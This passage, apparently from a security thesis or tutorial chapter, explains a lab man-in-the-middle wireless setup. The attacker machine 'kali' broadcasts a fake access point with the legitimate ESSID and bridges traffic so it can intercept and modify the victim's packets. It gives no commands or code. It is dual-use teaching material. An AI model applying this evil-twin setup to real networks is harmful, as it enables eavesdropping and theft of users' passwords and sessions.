4.1
- Man-In-The-Middle (MITM) wireless setup
The
basic idea of a MITM attack consists of an attacker taking a position
between the legitimates users of a network, so that the attacker can
eavesdrop the communication, having access to connections of the
victims, and relaying messages between them. The victims believe that
the communications are being legitimate, although the truth is that
the attacker has got actually the control of the process.
There
are a lot of different architectures or layouts in a MITM attack,
depending on the topology, characteristics and technologies available
at the network. In this chapter, the used setup will consist of the
victim "roch" trying to communicate with the legitimate AP,
and the attacker "kali" intercepting and relaying packets
between them.
In
this setup, the attacker "kali" is connected to the
Internet through a wired LAN with its Ethernet interface eth0. At the
same time, "kali" creates a fake AP, broadcasting an ESSID
equal to the legitimate's one. The victim "roch" would get
connected to this fake AP, believing that he is connected to the
legitimate AP.
For
that purpose "kali" creates a bridge between its wired and
virtual wireless interface, forwarding all the packets through the
bridge towards and from the Internet.
The
attacker "kali" has got access to analyze all the packets
sent and received by the victim "roch", not only
eavesdropping all the traffic over wireless, but also being able to
modify it with malicious intentions, as it will be seen later. For
instance, hijacking web sessions, creating denial of service attacks,
redirecting to sites intentionally created for the attack, stealing
cookies or passwords, redirectioning to ports, spoofing DNS requests
and responses, etc ...
